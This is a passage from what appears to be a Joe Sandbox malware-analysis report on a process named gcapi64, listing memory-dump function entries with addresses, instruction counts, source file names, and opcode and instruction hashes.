                                                                  • Opcode Fuzzy Hash: 16bc09b9737ac0fe32f2e59e1a0969c0f99e9274034b2500a6f9de1c67344eac
                                                                  • Instruction Fuzzy Hash: 8601282050E7481FD362973894552BA7FD1DF85214F0946AEE08DCA0B2CD984BC6C386
                                                                  Function 00007FFD9B6DCE10 Relevance: .0, Instructions: 46COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 045a46bc91dd6daf25b4158293d63e777bf4feaa1ba7326a6391f9c560466a7c
                                                                  • Instruction ID: 7ce82c2ad1295a7fb6bd6b73c59e0485dab5e589b12bf71d9cc09b800626462a
                                                                  • Opcode Fuzzy Hash: 045a46bc91dd6daf25b4158293d63e777bf4feaa1ba7326a6391f9c560466a7c
                                                                  • Instruction Fuzzy Hash: 5E018F7270D54D8BEB68CE18DCB0A7433A2EFD9314F56026CD46ECB3E2D925A912C704
                                                                  Function 00007FFD9B6D896E Relevance: .0, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 99a274dd7753b4bff5c3c50cceced31d497b28621f1d6e2bb7026f4616ad27fd
                                                                  • Instruction ID: d8f5bd934f54e24d5a869ffe5bf70870d5bf7ead30bac4020d3760e862ec10e4
                                                                  • Opcode Fuzzy Hash: 99a274dd7753b4bff5c3c50cceced31d497b28621f1d6e2bb7026f4616ad27fd
                                                                  • Instruction Fuzzy Hash: 5A014479B091068FE71CCFA4D8B0AB877A2AB85310F5566ADC017CF2D6DD386A048B45
                                                                  Function 00007FFD9B6D9FF8 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 73643ffb9d6854a5840188e1dd118fae07e813968bd8165566e7dc32d5cb4f88
                                                                  • Instruction ID: bf3fe79518b93c2cadcab551656910b3217baf520ad639448e938d6228dec0ec
                                                                  • Opcode Fuzzy Hash: 73643ffb9d6854a5840188e1dd118fae07e813968bd8165566e7dc32d5cb4f88
                                                                  • Instruction Fuzzy Hash: DA015A21A4F7C90FE7A347B45C312A03F615F87218F1B06E7D1888F0E3E9591A498362
                                                                  Function 00007FFD9B6DAE91 Relevance: .0, Instructions: 44COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0fa3abd3edb74f156689333ae60b16e3199c5eeb92c34488812ec0a852ab1cd9
                                                                  • Instruction ID: 63aee381a6a7934790a4f2a20d23b5075f942b20e08ee790c96641cb438ad5e7
                                                                  • Opcode Fuzzy Hash: 0fa3abd3edb74f156689333ae60b16e3199c5eeb92c34488812ec0a852ab1cd9
                                                                  • Instruction Fuzzy Hash: 81F0A421D0FA990BF77252A92C642A47F908F52310F0B01FAD998CF1E3D44E6EC5C392
                                                                  Function 00007FFD9B6DDD06 Relevance: .0, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1cb0878bb16d62c7a8038548138b8e16e1943b41c2b0f86dbf5cddcbe9bae396
                                                                  • Instruction ID: 652d9b073b99f78a6942bc05c064060913ac92e96dc1eca0911d033280edcdac
                                                                  • Opcode Fuzzy Hash: 1cb0878bb16d62c7a8038548138b8e16e1943b41c2b0f86dbf5cddcbe9bae396
                                                                  • Instruction Fuzzy Hash: 1801A231B19A494FC754EFB89862B6872D2EF84354B8106BCB41AC72E7DE2898018281
                                                                  Function 00007FFD9B6D8001 Relevance: .0, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c96526383bbb3d63d12523dac31f7bd0b3c3ee4913464ba2744f2216660adac3
                                                                  • Instruction ID: c5c3893cd3c1c30657463d1a1053a8000f0f16ae2dbff8eec20168d8beabee35
                                                                  • Opcode Fuzzy Hash: c96526383bbb3d63d12523dac31f7bd0b3c3ee4913464ba2744f2216660adac3
                                                                  • Instruction Fuzzy Hash: 8001F271F0F6494BD755DA54DC307A436939B95390F0606BAD00A8B1E7EC2829008341
                                                                  Function 00007FFD9B6DA62F Relevance: .0, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7d29aa399eb711b3eaf32d2832d4570cb5713536d8f46b12d255c192210cad8e
                                                                  • Instruction ID: e5bac0ac40d0562f3a96c7a5ed3195ab69cdaca8a149ab80b0dad1f5ee3421e7
                                                                  • Opcode Fuzzy Hash: 7d29aa399eb711b3eaf32d2832d4570cb5713536d8f46b12d255c192210cad8e
                                                                  • Instruction Fuzzy Hash: 29016231B0D2498FD765DE64D8A07A932A2EFC5310F564279D119CF2E6DA3CA9418740
                                                                  Function 00007FFD9B6DFAA5 Relevance: .0, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c9a518de364d8ec12c6c8cd4696546cdbaa360e7b2c5d4994e53551b6d0532b
                                                                  • Instruction ID: a4620902fb0dfd9863624d88185776b3caefec30d9eb881aeacdacf1f29718a8
                                                                  • Opcode Fuzzy Hash: 1c9a518de364d8ec12c6c8cd4696546cdbaa360e7b2c5d4994e53551b6d0532b
                                                                  • Instruction Fuzzy Hash: C4F05830609A0ECFCBA4EF48E844AEA37A0FF59300F110221F41EC31A0D730EAA0CB81
                                                                  Function 00007FFD9B6DBC14 Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d25d43691a08ba14efb8ad594121ef1edadcdf9a97a58c6eb64e7328d80c2385
                                                                  • Instruction ID: ec183aac06ab585d803d95bbb403413eab41801bca1a8d7c2a9ca3f6dcc41c24
                                                                  • Opcode Fuzzy Hash: d25d43691a08ba14efb8ad594121ef1edadcdf9a97a58c6eb64e7328d80c2385
                                                                  • Instruction Fuzzy Hash: 1CF0A011F0B5590FDA6662B84C2147826D28FC1110B8A82F5E02DCF2BBED1DBE824347
                                                                  Function 00007FFD9B6DC296 Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0bda677ed6cba7af9285dba5d0b96a7fa0439ff897ce6c9580657e1c8e5556f
                                                                  • Instruction ID: 9701042961fcabae68670bfa6035d4b565bd698dfa9553c1ce38ac3312e956a0
                                                                  • Opcode Fuzzy Hash: c0bda677ed6cba7af9285dba5d0b96a7fa0439ff897ce6c9580657e1c8e5556f
                                                                  • Instruction Fuzzy Hash: 50F01232A0D5094FDB59CE58DCB09643392EB99314B56026CD45EC73D6DA25A903C604
                                                                  Function 00007FFD9B6DFA8A Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0024d4ee5dd00f2ee0b17653f5dd42d3c2651366e0b1cf8c02a033ac972f7765
                                                                  • Instruction ID: b704e3d8815dddcf1ef24afdf392a4d89ad58aae0a052cfc23b751fe7a06fa84
                                                                  • Opcode Fuzzy Hash: 0024d4ee5dd00f2ee0b17653f5dd42d3c2651366e0b1cf8c02a033ac972f7765
                                                                  • Instruction Fuzzy Hash: 28F05E3191D50D9BEB14FBB8E4A9AFA3BA4EF05304F5445B5E41DC60B6DF34A294CB00
                                                                  Function 00007FFD9BA1DC0C Relevance: .0, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2540744026.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9ba10000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ef1a5b34204eff1f63ac28f3de52ee27fd1aa391fcb27f0bfc4210a153d3b2b
                                                                  • Instruction ID: ce56947bdad4610caa28edfe846a1938aaedfb6e5326100c2029914ae0604780
                                                                  • Opcode Fuzzy Hash: 8ef1a5b34204eff1f63ac28f3de52ee27fd1aa391fcb27f0bfc4210a153d3b2b
                                                                  • Instruction Fuzzy Hash: 0AE02673B4E70A0AF268155C78570F473C1E781171B50013FC88B815A3FC4734930285
                                                                  Function 00007FFD9B6DC58D Relevance: .0, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c0c9d2609b868e2679f7063d4b9ee4a98b674093c6f04935083d214a22b2a753
                                                                  • Instruction ID: 7d05033a8e03d83bc1dbd547f3fe756284235c385a504d410af9d285bf3d339a
                                                                  • Opcode Fuzzy Hash: c0c9d2609b868e2679f7063d4b9ee4a98b674093c6f04935083d214a22b2a753
                                                                  • Instruction Fuzzy Hash: D8F0A721E4E54D4BEA6546D89C7147436A5EFD2314F1602BDC09A8B1E3D91C77068515
                                                                  Function 00007FFD9B6F2FA0 Relevance: .0, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2732069db6b7bbbd8c371493d60030e1a7b123219c9deef909070632c62915eb
                                                                  • Instruction ID: 2abc6768a027bc1c0159ce36096be39a2351f188343ec6eec62ba51053595c7c
                                                                  • Opcode Fuzzy Hash: 2732069db6b7bbbd8c371493d60030e1a7b123219c9deef909070632c62915eb
                                                                  • Instruction Fuzzy Hash: 29F03070A66A0D8FDB54EFA4D4586F977A4FF18304F40447AE41CD61A1DB30A690CB00
                                                                  Function 00007FFD9B6D8B72 Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81b8b54ce9b6c6bea5909ed0c2bd72dea4e95e8172c9734873bb748188ba8906
                                                                  • Instruction ID: 5d0413398b4a72131c5c9733ccd15c410063d7cf93afafaf0cb23b4b2e39df40
                                                                  • Opcode Fuzzy Hash: 81b8b54ce9b6c6bea5909ed0c2bd72dea4e95e8172c9734873bb748188ba8906
                                                                  • Instruction Fuzzy Hash: 71F05471F0A5494FE761DB54DC607E43792AB85320F1647BAC0198F1E6DD3C6A458741
                                                                  Function 00007FFD9B6DC55E Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cb81baed433652e912826fa879041f14144e49a7c81f7af49fe697a15f06a213
                                                                  • Instruction ID: 69f0a83abd780951a76e2b72f651ecc089adfc17aea1634a24e274e21f1e3097
                                                                  • Opcode Fuzzy Hash: cb81baed433652e912826fa879041f14144e49a7c81f7af49fe697a15f06a213
                                                                  • Instruction Fuzzy Hash: CBF0A731A0D1094FF6255A549C641643360EFD2320F26027DC01A8B1E3D93DB6168508
                                                                  Function 00007FFD9B6D845C Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a67ea2d4b98188320c0f6f4d934e5dd3b4033f5a3a27c90ceee3a5d5a419ecad
                                                                  • Instruction ID: 5c7d056abf490415a30b870d21f18b9abb0e36938cebac40d1fd5ebd5d0f331d
                                                                  • Opcode Fuzzy Hash: a67ea2d4b98188320c0f6f4d934e5dd3b4033f5a3a27c90ceee3a5d5a419ecad
                                                                  • Instruction Fuzzy Hash: 38E0E571F0650E8FDBA8DB54C8556B873A3ABD8340F114269C05D97291DF353E554B41
                                                                  Function 00007FFD9B6DAEB0 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0b904f250ed006acb8511717f6f56dc34f1a737cc946a8f07cb01e30d8058ade
                                                                  • Instruction ID: 272327a4360b07faa077e3f8543d9d4cf5876a8f42360120dbba61c0968b2408
                                                                  • Opcode Fuzzy Hash: 0b904f250ed006acb8511717f6f56dc34f1a737cc946a8f07cb01e30d8058ade
                                                                  • Instruction Fuzzy Hash: BBE09A22E0FAAD0BFBB251E52C203A5AA544F42304F0702BAD9288F0E2D81D6E44D291
                                                                  Function 00007FFD9B6DC4B8 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 09e87fcab95478ccd3a6b68c9e4858c5cff5f0d8d523a7fd7475e49080270b61
                                                                  • Instruction ID: 13d9a195f32df52f983faea966a938e1a3bfec91d7fd669486ed68adb0b4f145
                                                                  • Opcode Fuzzy Hash: 09e87fcab95478ccd3a6b68c9e4858c5cff5f0d8d523a7fd7475e49080270b61
                                                                  • Instruction Fuzzy Hash: 7BE04810F1DA4A07D618666C582157972D1BFD4310F604775E42E871D7DD28F9414186
                                                                  Function 00007FFD9B6D550A Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff79daea00a9f73f645ba4aac3f9fd7be7262324e9b8db6d882df78f1957c676
                                                                  • Instruction ID: 1a0f1d2ff50fe10cfa16fd1b8a268087154fec9b731f448e7ef10229fc11374e
                                                                  • Opcode Fuzzy Hash: ff79daea00a9f73f645ba4aac3f9fd7be7262324e9b8db6d882df78f1957c676
                                                                  • Instruction Fuzzy Hash: EEE0CD3744E2CD4FD7225FB08C514D47FB1FF87600B1502D5D5A9CB062D556665B8341
                                                                  Function 00007FFD9B6D8DEE Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8283de2257c610660cf396c4aff321b98b68e97a6537b0820b1b608e2d75d2bf
                                                                  • Instruction ID: 9592bb61cf349cbfc0ae75b3d0540fc9036866294fe12b079e747802bc2be11b
                                                                  • Opcode Fuzzy Hash: 8283de2257c610660cf396c4aff321b98b68e97a6537b0820b1b608e2d75d2bf
                                                                  • Instruction Fuzzy Hash: A4E08661F191854FE762963848695E9BBA29FA1300F2605B7D465C71A2DD2899424342
                                                                  Function 00007FFD9B6D50E4 Relevance: .0, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c7c3ceeabdde5c94674af15219ea9664f5f4ccaf12cd4622d36d168115a11946
                                                                  • Instruction ID: 2fb7c3391f1d44b7341f007b2dd28cec666e1a171a19f807483314c7900c70cb
                                                                  • Opcode Fuzzy Hash: c7c3ceeabdde5c94674af15219ea9664f5f4ccaf12cd4622d36d168115a11946
                                                                  • Instruction Fuzzy Hash: DEE04672E0A51D8BDFA4CBA888946ACB3F0FF48300F21023DD019E3281DF38A8428B40
                                                                  Function 00007FFD9B6D4A96 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1a0f8a0a9695675cf45c3528cc2a4bf38807eb7b39e822e4c25f30ea30ed270d
                                                                  • Instruction ID: 2f3b5e9b988e33508887b18eb6aebbf39e112a25da203d6046ef92efd5e16b80
                                                                  • Opcode Fuzzy Hash: 1a0f8a0a9695675cf45c3528cc2a4bf38807eb7b39e822e4c25f30ea30ed270d
                                                                  • Instruction Fuzzy Hash: 38E01211B0A60F46E7705AE784A537952819F88300F11063EE9BA8E1E7EC187D404241
                                                                  Function 00007FFD9B6D876D Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e3a32156d524b37e562b3143c76efb0854bc93a55584a446e4fff5e7f9e2c35f
                                                                  • Instruction ID: 9aefa4bbffb4ad374612dd6d02094ad904c13e9ced0094681d65f9d559dacb83
                                                                  • Opcode Fuzzy Hash: e3a32156d524b37e562b3143c76efb0854bc93a55584a446e4fff5e7f9e2c35f
                                                                  • Instruction Fuzzy Hash: 38D05E30E0651A8FD761CB24C4507687361EF8A320F6902F9C1688B2AACA35AE81CF41
                                                                  Function 00007FFD9B6D80C9 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 90ba138e38e293e431e1e742e911c6dcab2d9800d27896e3258c1613496425ae
                                                                  • Instruction ID: 02bfa8821d8c94335a4be12a5c3b7a89213efcbcb0787588e37fd1ee22d34897
                                                                  • Opcode Fuzzy Hash: 90ba138e38e293e431e1e742e911c6dcab2d9800d27896e3258c1613496425ae
                                                                  • Instruction Fuzzy Hash: 8FD01776E0F5498BE3618AA8882037431915F84345F1702B9905D8B1E2DA286D018612
                                                                  Function 00007FFD9B6D48C0 Relevance: .0, Instructions: 7COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62ebdf483be9ab876bb89240b3a26d4beed924b89be83d0511937707a879a7d9
                                                                  • Instruction ID: 7192d9f56147aad1f63ed3a23a8d36426ec0885770390bd51abf787782a64266
                                                                  • Opcode Fuzzy Hash: 62ebdf483be9ab876bb89240b3a26d4beed924b89be83d0511937707a879a7d9
                                                                  • Instruction Fuzzy Hash: 8AA00206D9780E02D95871FA1DA709874909BC9114FC71264E85884296E88E2AE902A3
                                                                  Function 00007FFD9B6DC414 Relevance: .0, Instructions: 6COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9213839de6474c7257c6df6f3c36ba0f1084fcc21889830f8cd87e7e288146e5
                                                                  • Instruction ID: 1a5c361d340753495f2325c88a5941fc07057b05666f3905b4bee68016e62faa
                                                                  • Opcode Fuzzy Hash: 9213839de6474c7257c6df6f3c36ba0f1084fcc21889830f8cd87e7e288146e5
                                                                  • Instruction Fuzzy Hash: 45B01230E0D04E47E734998CDC627FC21917F85300F130138EC7E861E28C1C7D146141
                                                                  Function 00007FFD9B6D855E Relevance: .0, Instructions: 4COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5560dd02ec3789d7496163fa0f0aa4e85bf816683e487b34b8b3fb534ef607d7
                                                                  • Instruction ID: 881f274b0ca704f32675fb1f77c0cfccff57f854b422ba12ac0ae1ab3ea245ae
                                                                  • Opcode Fuzzy Hash: 5560dd02ec3789d7496163fa0f0aa4e85bf816683e487b34b8b3fb534ef607d7
                                                                  • Instruction Fuzzy Hash: 83A02230E0880CCEE3B0CA08CC003BC30F02BC8300F220ABA800EEB280C3382E802B03
                                                                  Function 00007FFD9B6DA8E5 Relevance: .0, Instructions: 3COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2506220896.00007FFD9B6D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6D0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffd9b6d0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 215151ad2eadf004dfd86a0790fadced54b998af657c8f656de0e404c1221c90
                                                                  • Instruction ID: 5a08b139f1cf808f77821734505b1b44add34d47a2d8241054a83843743d7cb0
                                                                  • Opcode Fuzzy Hash: 215151ad2eadf004dfd86a0790fadced54b998af657c8f656de0e404c1221c90
                                                                  • Instruction Fuzzy Hash: 23A02230E0C08CCFE3308E80C0003BC20A00B80300F230032802C820A0C83CA0002F00